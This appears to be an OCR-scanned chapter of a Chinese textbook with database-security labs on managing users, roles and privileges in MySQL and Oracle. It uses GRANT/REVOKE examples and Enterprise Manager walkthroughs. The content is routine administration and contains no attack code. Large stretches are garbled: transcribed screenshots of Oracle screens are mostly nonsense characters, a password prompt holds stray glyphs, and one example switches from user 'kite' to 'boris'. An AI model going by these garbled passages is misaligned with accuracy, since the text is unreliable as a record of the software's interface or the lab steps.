mysql>GRANT ALL on *.* TO newuser test@localhost IDENTIFIED BY "water"; 
Query OK, 0 rows affected (0.00 sec) 


mysql> exit 
Bye 


c:\Program Files\MySQL\MySQL Server 5.5\bin>mysql -u newuser test -p 
Enter passwoOrd: ** 太 克 大 太 粮 大 闪 太 太 

ERROR 1045 (28000): Access denied for user 'newuser test'@'localhost' 
(using pas 
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Sword: YES) 
c:\Program Files\MySQL\MySQL Server 5.5\bin>mysql -u newuser test -p 
Enter password: *** 太 
Welcome to the MySQL monitor. Commands end with ; or \g. 
Your MySQL connection id is 13 
Server version: 5.5.15 MySQL Community Server (GPL) 
Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights 
reserved. 
Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 
owners. 
Type 'help;' or '\h' for help. Type '\c' to clear the current input 
statement. 
mysql> 
【实验 报告 】 
按照 实验 步骤 完成 实验 ， 并 记录 实验 过 程 。 
【思考 题 】 


分 析 MySQL 与 SQL Server 用 户 管理 的 异同 。 
10.2.2 ”管理 用 户 角 色 


【实验 目的 】 
掌握 MySQL 数据 库 服务 器 的 角色 管理 。 
【原理 简介 】 


为 了 收回 某 个 用 户 的 权限 ， 可 使 用 REVOKE 语句 。 要 用 FROM 替换 TO 并 且 没 


有 IDENTIFIED BY 或 WITH GRANT OPTION 子 句 。 


语法 : REVOKE privileges (columns) ON what FROM user; 
user 部 分 必须 与 想 要 取消 其 权限 的 用 户 的 原始 GRANT 语句 的 user 部 分 相 匹配 。 
Privileges 部 分 不 需要 匹配 ， 可 用 GRANT 语句 授权 ， 然 后 用 REVOKE 语句 取消 启 


动 的 一 部 分 。 


消 了 


REVOKE 语句 只 删除 权限 ， 不 删除 用 户 。 用 户 的 项 仍然 保留 在 user 表 中 ， 即 使 取 
该 用 户 的 所 有 权限 也 是 如 此 。 这 意味 着 该 用 户 仍然 可 以 连接 到 服务 器 上 。 要 删除 整 


个 用 户 ， 必 须 用 DELETE 语句 将 该 用 户 的 记录 从 user 表 中 直接 删除 。 要 想 删除 整个 用 


a 
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必须 直接 将 该 用 户 的 记录 从 user 表 中 直接 删除 。 


入 
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例如 ， 如 果 为 一 个 数据 库 授权 ， 需 要 在 mysql.db 表 中 创建 一 个 条 目 。 
mysql>GRANT ALL ON sample.* TO kite@localhost IDENTIFIED BY "ruby"; 
当 所 有 为 数据 库 的 授权 用 REVOKE 删除 时 ， 这 个 条 目 被 删除 。 

mysql>REVOKE ALL ON sample.* FROM kite@localhost; 


但 是 ，boris@localhost 用 户 的 条 目 仍旧 留 在 user 表 中 。 


【实验 环境 】 
MySQL 5.0 以 上 数据 库 系 统 。 
【实验 步骤 】 


1. 增加 用 户 角色 

(1) 打开 MySQL Workbench 5.2 CE， 单 击 Server Administration， 出 现 如 图 10-20 所 
示 对 话 框 ， 单 击 OK 后 出 现 登 录 界 面 ， 输 入 密码 即 可 进入 服务 器 管理 界面 ， 如 图 10-21 
所 示 ， 在 该 软件 中 可 以 实现 对 数据 库 的 管理 。 

(2) 单 击 左 侧 的 Users and Privileges， 出 现 如 图 10-25 所 示 的 用 户 和 权限 管理 界面 。 
选中 一 个 用 户 可 以 查看 该 用 户 对 应 的 角色 、 权 限 。 
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图 10-25 ”增加 用 户 角 色 权 限 


(3) 选择 用 户 newuser， 选 中 Administrative Roles 选项 卡 ， 出 现 该 用 户 的 当前 角色 ， 
如 果 给 用 户 添加 UserAdmin 角色 ， 则 选择 Role 里 面 的 UserAdmin， 然 后 单 击 下 面 的 
Apply 按钮 即 可 。 

2. 删除 用 户 角 色 

(1) 打开 MySQL Workbench 5.2 CE， 单 击 Server Administration， 出 现 如 图 10-20 所 
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示 对 话 框 ， 单 击 OK 后 出 现 登 录 界 面 ， 输 入 密码 即 可 进入 服务 器 管理 界面 ， 如 图 10-21 
所 示 ， 在 该 软件 中 可 以 实现 对 数据 库 的 管理 。 

(2) 单 击 左 侧 的 Users and Privileges， 出 现 如 图 10-25 所 示 的 用 户 和 权限 管理 界面 。 
选中 一 个 用 户 可 以 查看 该 用 户 对 应 的 角色 、 权 限 。 

(3) 选择 用 户 newuser， 选 中 Administrative Roles 选项 卡 ， 出 现 该 用 户 的 当前 角色 ， 
如 果 给 用 户 去 除 UserAdmin 角色 ， 取 消 选择 Role 里 面 的 UserAdmin 选项 ， 然 后 单 击 下 
面 的 Apply 按钮 即 可 。 如 果 取 消 用 户 的 所 有 权限 , 则 单 击 Revoke All Privileges 按钮 即 可 。 


【实验 报告 】 
按照 实验 步骤 完成 实验 ， 并 记录 实验 过 程 。 
【思考 题 】 


如 何在 MySQL 里 面 实现 最 小 权限 授权 原则 ? 
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Oracle 数据 库 管 理 系统 是 一 个 以 关系 型 和 面向 对 象 为 中 心 管理 数据 的 数据 库 管 理 软 
件 系统 ， 其 在 管理 信息 系统 、 企 业 数 据 处 理 、 因 特 网 及 电子 商务 等 领域 有 着 非常 广泛 的 
应 用 。 因 其 在 数据 安全 性 与 数据 完整 性 控制 方面 的 优越 性 能 ， 以 及 跨 操作 系统 、 跨 硬件 
平台 的 数据 互 操作 能 力 ， 使 得 越 来 越 多 的 用 户 将 Oracle 作为 其 应 用 数据 的 处 理 系统 。 

Oracle 数据 库 是 基于 客户 -服务 器 模式 结构 。 客 户 端 应 用 程序 执行 与 用 户 进行 交互 的 
活动 。 其 接收 用 户 信息 ， 并 向 服务 器 端 发 送 请 求 。 服 务 器 系统 负责 管理 数据 信息 和 各 种 
操作 数据 的 活动 。 

Oracle Server 是 一 个 对 象 -关系 数据 库 管 理 系统 。 它 提供 开放 的 、 全 面 的 和 集成 的 信 
息 管理 方法 。 每 个 Server 由 一 个 Oracle DB 和 一 个 Oracle Server 实例 组 成 。 它 具有 场地 
自治 性 〈Site Autonomy ) 和 提供 数据 存储 透明 机 制 ， 以 此 可 实现 数据 存储 透明 性 。 每 个 
Oracle 数据 库 对 应 唯一 的 一 个 实例 名 SID 。Oracle 数据 库 服务 器 启动 后 ， 一 般 至 少 有 以 
下 几 个 用 户 : Internal, 它 不 是 一 个 真实 的 用 户 名 , 而 是 具有 SYSDBA 优先 级 的 Sys 用 户 
的 别名 ， 它 由 DBA 用 户 使 用 来 完成 数据 库 的 管理 任务 ， 包 括 启 动 和 关闭 数据 库 ，Sys， 
它 是 一 个 DBA 用 户 名 ， 具 有 最 大 的 数据 库 操作 权限 ; System， 它 也 是 一 个 DBA 用 户 
名 ,权限 仅 次 于 Sys 用 户 。 


10.3.1 管理 用 户 账号 


【实验 目的 】 
掌握 Oracle 数据 库 服务 器 的 用 户 管理 。 
【原理 简介 】 


若 要 访问 一 个 Oracle 数据 库 中 的 数据 ， 必 须 先 访问 该 数据 库 的 一 个 账户 。 这 个 访问 
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可 以 是 直接 访问 一 一 通过 到 一 个 数据 库 的 用 户 连接 一 一 或 间接 访问 。 间 接 访问 包括 通过 
在 数据 库 连 接 中 预 设 权限 的 访问 。 每 个 账户 必须 有 一 个 与 其 相关 的 口令 。 一 个 数据 库 账 
户 也 可 以 连接 到 一 个 操作 系统 账户 上 。 每 一 个 数据 库 用 户 都 有 自己 的 数据 库 账 户 。 这 是 
Oracle 的 最 佳 实践 建议 ， 这 样 可 避免 存在 潜在 的 安全 漏洞 ， 为 特定 的 审计 活动 提供 有 意 
义 的 数据 。 

口令 是 在 创建 用 户 账户 时 为 每 一 个 用 户 设 置 的 ， 并 可 在 该 账户 创建 后 对 它们 进行 变 
更 。 用 户 变 更 账户 口令 的 能 力 受 他 (她 ) 访问 工具 权限 的 限制 。 数 据 库 以 加 密 的 形式 将 
口令 存储 在 一 个 数据 字典 表 中 。 如 果 账 户 直 接 与 操作 系统 账户 相关 ， 就 可 以 旁 路 口令 
检查 。 

在 Oracle 中 ,口令 可 以 无 效 。 数 据 库 管理 员 可 以 建立 能 重复 使 用 口令 的 条 件 (通过 
一 个 数据 库 口令 历史 设置 值 ) 。 而 且 ， 可 以 使 用 环境 文件 为 口令 制定 标准 《例如 最 小 长 
度 ) ， 如 果 连 续 多 次 与 账户 连接 都 不 成 功 ， 就 可 以 自动 锁定 账户 。 


【实验 环境 】 
Oracle 10g 以 上 数据 库 系 统 。 


【实验 步骤 】 

1. 创建 新 用 户 和 授权 
(1) 以 SYS 用 户 登 录 Oracle Enterprise Manager， 出 现 如 图 10-26 所 示 界 面 。 
和 本 "| 

GE Er 
ET 

| ORACLE Enterprise Manager 11g Eg 间 上 

Database Control er | 


作为 SYS 登录 
数据 库 实例 : webdb.com 四 _ 
主 目录 。 性 能 。 可 用 性 ] 服务 器 | 方案 ”数据 移动 软件 和 支持 


数据库 配 置 “Oracle Scheduler _ 
由 存 描 导 


统计 信息 管理 


图 10-26 Oracle Enterprise Manager 
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(2) 选择 【服务 器 】|【 安 全 性 】|【 用 户 ]， 出 现 用 户 管理 界面 ， 如 图 10-27 所 示 。 


ORACLE Enterprise Manager 119 
Database Control | 

元 据 库 详 侈 - webdb com > 作为 SYS 登录 
用 户 


对 象 类 型 用 户 | 


搜索 
输入 对 象 名 以 过 源 结果 集 内 显示 的 数据 * 
对 象 名 


默认 情况 下 , 搜索 将 逐 回 以 化 输入 的 字符 于 开 浆 的 所 有 大 瑟 的 匹配 直 果 -要 进行 精确 匹配 或 大 小 写 匹 配 . 请 用 英文 双 引 和 将 搜索 字符 素 括 起 


来 .在 英文 双 引 号 插 起 来 的 字符 半 中 , 可 以 使 用 通配符 (%). 
选择 模式 单 选 ~ [Ca) 
[大 条 要 本 ) 珊 际 ) 报 作 类似 创 建 。，，-【 弄 同 ) 日 上 上 125131 -| 后 6 订 记 好 可 


国 ANONYMOUS EXPIRED & 201042，SYSAUX TEMP DEFAULT 
LOCKED ”下 午 02 时 
ull 19 分 33 秒 
® APEX 030200 EXPIRED & 20104-2 SYSAUX TEMP DEFAULT 
ockED 53 
19 分 33 


[APEX_PUBLIC USER 201042 
© | 和 USERS TEMP DEFAULT 


图 10-27 Oracle 用 户 管理 


(3) 单 击 【创建 】 按 钮 ， 出 现 新 增 用 户 的 界面 ， 如 图 10-28 所 示 。 按 图 所 示 输入 用 
户 名 和 登录 口令 ， 带 星 号 的 选项 是 必须 输入 ， 其 他 的 可 以 根据 实际 情况 进行 输入 。 如 果 


不 进行 角色 、 权 限 和 限额 配置 ， 单 击 【确定 】 即 可 把 用 户 添加 到 数据 库 。 
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ORACLE Enterprise Manager 11g 设置 首先 项 帮助 注 答 上 [ 
Database Control A 
数据 库 实 例 : webdb com > 用 户 > 作为 SYS 登录 
|| 创建 用 户 | | | 


ED GED Ga 
] 一 级 信息 【角色 。 系统 权限 。 对 象 权限 。 限 牙 。 使 用 者 组 权限 。 代理 用 户 
* 名 称 test_manager 
概要 文件 DEFAULT 
验证 [口令 “ 
“ADS seeseee 
“DS sseesee 
如 果 选 择 “口令 ", 刚 通过 口令 向 角色 授权 = 
回 口令 即刻 失效 
时 二 有 USERS | 净 
临时 未 空间 TEMP rd 
状态 @ 锁 定 @ 未 锁定 


| 一般 信 息 「 角色 。 系统 权限 。 对 象 权限 。 限 匡 。 使 用 者 组 权限 。 代理 用 户 


图 10-28 ”新 增 用 户 界面 
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2. 解除 用 户 账户 的 锁定 并 重 置 口令 

在 安装 和 创建 数据 库 的 过 程 中 , 可 以 在 解除 对 Oracle 提供 的 多 个 数据 库 用 户 账户 的 
锁定 后 重 置 。 如 果 当 时 未 选择 解除 用 户 账户 的 锁定 ， 则 可 以 通过 在 【用 户 】 页 上 选择 用 
户 ， 解 除 用 户 锁 定 ， 然 后 重 置 口令 。 

(1) 在 用 户 页 上 搜索 项 中 输入 “SCOTT”， 然 后 单 击 【 开 始 ])， 出 现 如 图 10-29 所 示 
的 界面 。 可 以 看 到 SCOTT 用 户 的 账户 状态 为 EXPIRED & LOCKED， 标 明 用 户 被 锁定 ， 
这 时 的 用 户 不 能 使 用 数据 。 


搜索 

输入 对 象 名 以 过 源 结 果 集 内 显示 的 数据 * 

对 象 名 SCOTT 开始 

默认 情况 下 , 检索 将 返回 以 千夫 入 的 闻 符 过 开头 的 所 有 大 写 的 匹 导 结果 .要 运行 寄 确 匹 攻 或 大 小 写 匹 攻 ， 


请 用 英文 双 引 号 将 搜索 字符 素 鬼 起 来 。 在 英文 双 引 号 括 起 来 的 闻 符 举 中 , 可 以 使 用 通 苇 符 (%%)。 


选择 模式 单 选 ~ 


图 10-29 用 户 管理 界面 
(2) 选中 SCOTT， 然 后 单 击 【 编 辑 】 按 钮 ， 出 现 如 图 10-30 所 示 的 界面 。 


ES 


€SE BS omen ” 

报 作 类似 创建 -GD ED EDED| 

三 一 艇 信息 | 角色 。 素 这 权限 ” 对象 权 限 。” 碌 业 使 有 者 组 权限 代 刘 用 | | 
名 称 SCOTT 

概要 文件 DEFAULT bd 
验证 口令 ~ 
“输入 口令 eeeee 


* 育 A 口令 eeeesl 
如 果 选 择 “ 口 令 ”, 则 通过 口令 向 角色 授权 。 


口令 状态 Expired 
址 入 一 个 口令 并 加 以 确认 , 以 使 六 口 入 不 失效 


点 认 去 空间 USERS 
临时 表 空 间 TEMP 
状态 加 锁定 @ 未 锁定 
| 一 级 信息 「 蚀 色 未 统 权限 ”对象 权限 


图 10-30 ”编辑 用 户 信息 
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(3) 在 【输入 口令 】 和 【确认 口令 】 字 段 中 输入 新 口令 。 
(4) 选中 【未 锁定 】 复 选 框 。 
(5) 单 击 【 应 用 】， 重 置 口令 并 解除 用 户 账户 的 锁定 。 


3. 删除 用 户 
(1) 在 用 户 页 上 搜索 项 中 输入 “TEST”， 然 后 单 击 【开始 】 出现 如 图 10-31 所 示 的 


界面 。 可 以 看 到 添加 的 TEST_ MANAGER 用 户 。 


ORACLE Enterprise Manager 11g 3 间 旺 芋 渤 项 这 抒 这 销 
Database Control 了 ws | 
数据 库 实 例 :webdb com > 作为 SYS 登录 


用 户 有 
对 象 类 型 用 户 ~ 


搜索 
输入 对 象 名 以 过 滤 结 果 集 内 显示 的 数据 。 


对 象 名 TEST (FB) 
默认 傅 况 下 , 搜索 将 返回 以 您 输 入 的 闻 符 举 开 头 的 所 有 大 写 的 匹 匠 关 果 。 要 进行 烽 确 匹 匠 或 大 小 写 匹 攻 ， 


请 用 英文 双 引号 将 搜索 闻 符 弟 括 起 来 。 在 英文 双 引号 括 起 来 的 字符 束 中 , 可 以 使 用 过 配 符 (%). 


选择 模式 单 选 ~ (8 权 ) 
( 编 加 儿 查看 )( 删除 ) 操 作 类 似 创建 -( 始 ) 


S 


- 2012-2-25 - 2011-8-29 7 
® TEST_MANAGER OPEN ?2225 USERS TEMP De LOCAL 
42 分 01 


图 10-31 用 户 管理 


(2) 选择 TEST MANAGER 用 户 然后 单 击 【 删 除 】 按 钮 ， 出 现 如 图 10-32 所 示 的 界 
面 ， 单 击 【是 】 按 钮 即 可 删 掉 用 户 。 


ORACLE Enterprise Manager 119 下 
Database Control ha 


园 确认 
是 否 确实 要 删除 用 户 TEST_MANAGER? 


国 国 


数据 库 | 设置 | 首选 而 | 帮助 | 注销 


版 权 所 有 (ec) 1996, 2010, Oracle。 保 窗 所 有 权利 - 
]D Edwards, PeoplaSoft 和 Retek 是 Oracle Corporation 和 /或 其 于 公司 的 注册 总 标 。 其 他 名 称 可 能 号 其 


Oracke, 
关于 Oracle Enterprise Manager 四 
| 1 


图 10-32” 删 掉 用 户 
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【实验 报告 】 
【思考 题 】 
分 析 Oracle 与 SQL Server 用 户 管理 的 异同 。 


10.3.2 ”管理 用 户 权 限 


【实验 目的 】 
掌握 Oracle 数据 库 服务 器 的 权限 管理 。 


【原理 简介 】 

建立 用 户 时 ， 用 户 没 有 任何 权限 ， 也 不 能 执行 任何 操作 。 如 果 用 户 要 执行 特定 的 数 
据 库 操作 ， 必 须 为 其 授予 系统 权限 ; 如 果 用 户 要 访问 其 他 方案 的 对 象 ， 则 必须 为 其 授予 
对 象 权限 。 

权限 是 一 种 执行 特定 类 型 的 SQL 语句 或 访问 其 他 用 户 的 对 象 时 使 用 的 权利 。Oracle 
数据 库 可 以 让 管理 员 控 制 用 户 在 数据 库 中 可 以 或 不 可 以 ) 执行 的 操作 。 权 限 可 分 为 以 
下 两 种 类 别 。 

1. 系统 权限 

用 户 可 使 用 每 一 个 系统 权限 执行 特定 的 数据 库 操 作 或 对 数据 库 操作 分 类 。 例 如 ， 创 
建 表 空间 的 权限 就 是 一 个 系统 权限 。 系 统 权 限 可 由 管理 员 授 予 ， 或 者 由 可 以 显 式 授予 管 
理 权 限 的 用 户 授予 。 共 有 一 百 多 种 不 同 的 系统 权限 。 很 多 系统 权限 都 包含 ANY 子 句 。 

常见 系统 权限 如 下 。 

SYSDBA 和 SYSOPER: 使 用 这 两 个 权限 可 以 在 数据 库 中 执行 关闭 、 启 动 、 恢 复 及 
其 他 管理 任务 。 用 户 使 用 SYSOPER 可 执行 基本 操作 任务 ， 但 不 能 查看 用 户 数据 。 这 个 
权限 包括 以 下 系统 权限 : 

e STARTUP 和 SHUTDOWN 
CREATE SPFILE 
ALTER DATABASE OPEN/MOUNT/BACKUP 
ALTER DATABASE ARCHIVELOG 
ALTER DATABASE RECOVER( 仅 限 完全 恢复 ,任何 形式 的 不 完全 恢复 , 如 UNTIL 
TIMEICHANGEICANCELICONTROLFILE， 需 要 以 SYSDBA 身份 建立 连接 ) 

® RESTRICTED SESSION 

除 此 之 外 ，SYSDBA 系统 权限 还 可 授权 执行 不 完全 恢复 和 删除 数据 库 。 用 户 使 用 
SYSDBA 系统 权限 可 以 SYS 用 户 身 份 有 效 地 建立 连接 。 

DROPANY: 用 户 使 用 DROPANY 权限 可 删除 其 他 用 户 拥 有 的 对 象 。 

CREATE、MANAGE、DROP 和 ALTER TABLESPACE: 这 些 权限 用 于 表 空 间 管 理 ， 
包括 创建 、 删 除 和 更 改 表 空 间 的 属性 。 

CREATE ANY DIRECTORY: 使 用 Oracle 数据 库 可 以 让 开发 人 员 在 PL/SQL 内 调用 
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外 部 代码 (例如 C 库 )。 作 为 一 种 安全 措施 ， 代 码 所 在 的 操作 系统 目录 必须 链接 到 一 个 
虚拟 Oracle 目录 对 象 。 使 用 CREATE ANY DIRECTORY 权限 时 ， 有 可 能 会 调用 不 安全 
的 代码 对 象 。 用 户 使 用 CREATE ANY DIRECTORY 权限 可 以 在 Oracle 软件 所 有 者 能 够 
访问 的 任何 目录 中 创建 目录 对 象 ( 具 有 读 写 访 问 权限 )。 这 意味 着 用 户 可 以 访问 那些 目录 
中 的 外 部 过 程 。 用 户 可 以 尝试 直接 读 写 任何 数据 库 文 件 ， 如 数据 文件 、 重 做 日 志和 审计 
日 志 。 一定 要 确保 在 组 织 中 采用 了 安全 策略 ， 以 防止 误 用 类 似 这 种 作用 很 强 的 权限 。 

GRANT ANY OBJECT PRIVILEGE: 使 用 此 权限 可 以 对 用 户 未 拥有 的 对 象 授予 对 象 
权限 。 

ALTER DATABASE 和 ALTER SYSTEM: 这 些 权限 的 作用 很 强 ， 可 用 于 修改 数据 
库 和 Oracle 实例 ， 如 重 命名 数据 文件 或 刷新 缓冲 区 高 速 缓存 。 

2. 对 象 权 限 
用 户 可 以 使 用 对 象 权 限 对 特定 对 象 (如 表 、 视 图 、 序 列 、 过 程 、 函 数 或 程序 包 ) 执 
行 特定 的 操作 。 在 没有 特定 权限 的 情况 下 ， 用 户 只 能 访问 他 们 自己 拥有 的 对 象 。 对 象 权 
限 可 以 由 对 象 的 所 有 者 或 管理 员 授予 ， 也 可 以 由 显 式 授 予 对 象 权 限 的 用 户 授予 。 


【实验 环境 】 
Oracle 10g 以 上 数据 库 系 统 。 


【实验 步骤 】 

1. 管理 用 户 的 系统 权限 

(1) 以 SYS 用 户 登 录 Oracle Enterprise Manager， 选 择 【 服 务 器 】|【 安 全 性 】| 【用 
户 】， 出 现 用 户 管理 界面 ， 如 图 10-27 所 示 。 选 择 用户 SCOTT， 单 击 【 编 辑 】 按 钮 ， 然 
后 选择 【系统 权限 】 出 现 如 图 10-33 所 示 的 界面 。 


昌吉 
ORACLE Enterprise Manager11g = 和 SB 
Database Control | 


雪 据 库 实例 : webdb com > 用 户 > 作为 SYS 登录 
编辑 用 户 : SCOTT 


操作 类 似 创建 “| (于 二) 。 (至 示 SQL ) (还原 ) (应 用 | 
RE ] 系统 权 限 | 对 全 权限 ” 碌 晤 ”信用 者 


am 


UNLIMITED TABIESPACE 


二 站 信息 。 角色 | 系统 权限 「 对 象 权限 。 限额 。 使 用 者 组 


操作 类 似 创建 ~ ( 弄 妇 ) (到 未 SQL ) (还 原 ) ( 瑟 用 
数据 库 | 设置 | 首先 项 | 部 助 | 注 箔 
版 权 所 有 (c) 1996, 2010. Oracle. 保 窗 所 有 权利 - 
5 


图 10-33 ”系统 权限 管理 界面 
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(2) 单 击 【编辑 列表 】 按 钮 出 现 如 图 10-34 所 示 的 界面 ， 在 左 侧 【可 用 系统 权限 】 
列表 中 可 以 选择 一 个 系统 权限 ， 然 后 单 击 【 移 动 】 按 钮 ， 把 该 系统 权限 赋予 该 用 户 ， 也 
可 以 在 右 侧 【 所 选 系统 权限 】 中 选择 一 个 系统 权限 ， 然 后 单 击 【 移 去 】 按 钮 ， 把 该 系统 
权限 从 用 户 权 限 表 中 删 掉 。 然 后 单 击 【确定 】 即 可 。 选 择 CREATE TABLE 权限 ， 然 后 
把 它 添加 到 用 户 的 系统 权限 中 去 。 


ORACLE Enterprise Manager 119 旭 置 首选 项 有 有 助 注销 
Database Control | 


数据 库 实 例 : webdb com > 用 户 > 作为 SYS 登录 
修改 系统 权限 


可 用 系统 权限 所 选 系统 权限 


CREATE PUBUC SYNONYM UNUMITED TABLESPACE 
CREATE ROLE 
CREATE ROLLBACK SEGMENT 
CREATE RULE 
CREATE RULE SET 
CREATE SEQUENCE 
CREATE SESSION 
CREATE SYNONYM 
REATE TABLE 
CREATE TABLESPACE 


图 10-34 ”修改 系统 权限 
(3) 在 SCOTT 的 系统 权限 列表 中 可 以 看 到 CREATE TABLE 权限 , 如 图 10-35 所 示 ， 


数据 库 实例 : webdb com > 用 户 > 作为 SYS 登录 
编辑 用 户 : SCOTT 


操作 类 似 创建 > (开始 ) (显示 SQL ) (还 原 ) ( 应 用 ) 


二 级 信息 。 角色 | 系统 权限 |， 对象 权限 。 限额 ” 使 用 者 组 权限 。 代理 用 户 


CREATE TABLE 
UNLIMITED TABLESPACE 


| 天 要 站 RE 语 信人 
拓 作 关公 人 建 -i)  (E 示 SQL ) (KE) (CE 用 ) 


上 
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然后 单 击 【应 用 】 这 样 才能 把 权限 真正 添加 到 用 户 。 如 果 选 中 【管理 选项 】 复 选 框 ， 可 
以 管理 权限 并 将 系统 权限 授予 其 他 用 户 。 

2. 管理 用 户 的 对 象 权限 

(1) 以 SYS 用 户 登 录 Oracle Enterprise Manager， 选 择 【 服 务 器 】|【 安 全 性 】|【 用 
户 】 出 现 用 户 管理 界面 ， 如 图 10-27 所 示 。 选 择 用户 SCOTT， 单 击 【 编 辑 】 按 钮 ， 然 
后 选择 【对 象 权 限 】 出 现 如 图 10-36 所 示 的 界面 。 


二 Sa = Orade Enterpti 
文件 ”编外 吉 看 WV 收 太夫 工具 中 | Oracle Enterprise Manager - 六 各 用 广 : SCOTT 
ORACLE Enterprise Manager 11g 让 


Database Control 


数据 库 实例 : webdb com > 用 户 > 作为 SYS 登录 
编辑 用 户 : SCOTT 


操作 类似 创建 -| (开始 ) ”( 蚂 未 5QL ) (水原) (下 用 ) 


二 般 信 息 。 角色 。 系统 权限 | 对 象 权限 | 限额 ”使用 者 组 权限 ”代理 用 户 


选择 对 象 类 型 Java 源 。 ~ 


未 找到 任何 项 
二 盘 信 息 。 角色 。 系统 权限 | 对 象 权限 | 限额 ” 使 用 者 组 权限 。 代理 用 户 
操作 类 似 创建 -| (开始 ) (到 示 SQL ) (还 原 ) (LE 用 ) 
数据 库 | 设置 | 首选 项 | 帮助 | 注销 
版 权 所 有 《c) 1996, 2010, Oracle。 保 贸 所 有 权利 - 
9 ee 


PeopleSoft 和 Retek 是 Oracie Corporation 和 /或 其 于 公司 的 注册 商标 。 其 他 名 称 可 能 是 其 各 
ise Manaper 


图 10-36 对象 权限 列表 


(2) 在 【选择 对 象 类 型 】 中 选择 【 表 】 作 为 要 编辑 权限 的 对 象 ， 然 后 单 击 【 添 加 】 
按钮 ， 出 现 如 图 10-37 所 示 的 界面 。 

(3) 单 击 右 上 侧 的 手电 简 状 的 【选择 表 对 象 】 按 钮 ， 出 现 如 图 10-38 所 示 的 界面 ， 
首先 选择 方案 ， 然 后 单 击 【 开 始 】 按 钮 ， 出 现 该 方案 下 的 表 对 象 ， 从 下 面 的 表 对 象 中 选 
择 表 ， 然 后 单 击 【 确 定 】 按 钮 。 选 择 方案 SCOTT， 选 择 表 对 象 为 EMP， 单 击 【 确 定 】 
按钮 ， 出 现 如 图 10-39 所 示 的 界面 。 

(4) 在 左 侧 的 【可 用 权限 】 列 表 中 显示 了 针对 表 SCOTT.EMP 所 示 的 权限 ， 选 择 一 
个 权限 ， 然 后 单 击 【 移 动 】 即 可 把 权限 赋予 用 户 ， 也 可 以 从 【所 选 权限 】 列 表 中 ， 选 择 
一 个 权限 ， 然 后 单 击 【 移 去 】 按 钮 ， 去 除 一 个 用 户 的 对 象 权限 。 对 和 象 权限 选择 完成 后 ， 
单 击 【 确 定 】 按 钮 ， 出 现 如 图 10-40 所 示 的 界面 。 

(5) 在 如 图 10-40 所 示 的 界面 中 用 户 可 以 继续 添加 其 他 对 象 权限 ， 也 可 以 选择 一 个 
权限 ， 单 击 【 删 除 】 按 钮 ， 去 掉 一 个 对 象 权 限 。 所 有 的 对 象 权 限 编辑 完成 后 ， 单 击 【应 
用 】 按 钮 ， 把 对 象 权限 赋予 用 户 ， 这 时 用 户 就 可 以 使 用 该 对 象 权限 了 。 如 果 选 中 【授权 
选项 】 复 选 框 ， 允 许 该 用 户 向 其 他 用 户 授 予 同一 访问 权限 。 
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ORACLE Enterprise Manager11 


Database Control ha 


数据 库 实例 - webdb.com > 用 户 > 
添加 表 对 象 权限 


* 选择 表 对 象 


| 


ChemaName 表 
选择 对 象 , 然后 迁 择 要 分 配 的 权限 
可 用 权限 


ALTER 
DELETE 
INDEX 
INSERT 
REFERENCES 
SELECT 
UPDATE 


(BE 本) GBR) 


搜索 


要 查找 您 的 项 目 , 请 在 下 拉 列表 中 选择 方案 , 并 在 文本 字段 中 输入 单词 , 然后 选择 
i 按钮 。 要 查看 所 选 方案 中 所 有 表 的 列表 , 请 清除 搜索 框 并 单 击 “开始 " 按 


方案 SCOTT 本 
搜索 表 名 称 
全 选 | 全 部 不 先 
罗 


图 10-38 选择 表 对 象 
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设 墨 首选 机 帮 动 注 镇 


ORACLE Enterprise Manager119 
Database Control a 


数据 库 详 例 - webdb.com > 用 户 > 作为 SYS 登录 


添加 表 对 象 权限 

取消 确定 
~ 选择 表 对 象 
ScoTT .EMP 


(SchemaName 表 ,.) 
壬 帮 对 象 .然后 过 将 要 分 本 的 权限 
可 用 权限 


INSERT 
REFERENCES 
UPDATE 


ORACLE Enterprise Manager119 
Database Control 


数据 库 实例 : webdb com > 用 户 > 作为 SYS 登录 
编辑 用 户 : SCOTT 
操作 类 似 创建 > (开始 显示 SQL ) (还 原 ) ( 应 用 


对 象 权限 


选择 对 象 


图 10-40 对象 权 限 列表 


【实验 报告 】 

(1) 具有 ADMINOPTION 系统 权限 的 用 户 可 撤销 其 他 任何 数据 库 用 户 的 权限 。 撤 
销 者 与 最 初 被 授予 权限 的 用 户 不 一 定 是 同一 个 用 户 。 撤 销 系统 权限 时 不 会 产生 级 联 影 
响 。 参 照 上 述 实验 过 程 完成 如 下 的 实验 操作 。 

@ DBA 将 CREATE TABLE 系统 权限 连同 【管理 选项 】 授 予 Jeff。 

@ Jeff 创建 一 个 表 。 

@ Jeff 将 CREATE TABLE 系统 权限 授予 Emi。 

@ Emi 创建 一 个 表 。 
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@@ DBA 撤销 Jeff 的 CREATE TABLE 系统 权限 。 

结果 : 

Jeff 的 表 仍 然 存在 ， 但 是 他 不 能 创建 新 表 。 

Emi 的 表 仍然 存在 ， 而 且 她 仍然 具有 CREATE TABLE 系统 权限 。 

(2) 撤销 与 数据 操纵 语言 (DML) 操作 相关 的 系统 权限 时 可 能 会 出 现 级 联 影响 。 例 
如 ， 如 果 将 SELECT ANY TABLE 权限 授予 某 个 用 户 ， 该 用 户 又 创建 了 使 用 表 的 过 程 ， 
则 必须 先 重新 编译 用 户 方案 中 包含 的 所 有 过 程 , 才 可 以 再 次 使 用 这 些 过 程 ,指定 了 WITH 
GRANT OPTION 时 撤销 对 象 权限 也 会 产生 级 联 影 响 。 

参照 上 述 实验 过 程 完成 如 下 的 实验 操作 。 

@ Jeff 被 授予 关于 EMPLOYEES 的 SELECT 对 象 权限 连同 GRANT OPTION。 

@ Jeff 将 关于 EMPLOYEES 的 SELECT 权限 授予 Emi。 

@ 随后 ， 撤 销 Jeff 的 SELECT 权限 。 这 个 撤销 操作 会 同时 对 Emi 产生 级 联 影 响 。 


【思考 题 】 
如 何在 Oracle 里 面 实现 最 小 权限 授权 原则 ? 


10.3.3 ”管理 数据 库 角色 


【实验 目的 】 
掌握 Oracle 数据 库 服务 器 的 角色 管理 。 


【原理 简介 】 

在 大 多 数 系统 中 ， 将 必需 的 权限 一 个 一 个 授予 每 一 个 用 户 是 很 耗 时 的 工作 ， 而 且 很 
有 可 能 会 出 错 。Oracle 软件 通过 角色 可 实现 简单 且 受 控 的 权限 管理 。 角 色 是 可 授予 用 户 
或 其 他 角色 的 、 由 相关 权限 组 成 的 一 些 命名 组 。 角 色 的 设计 目的 是 为 了 简化 数据 库 中 的 
权限 管理 ， 从 而 可 提高 数据 库 的 安全 性 。 

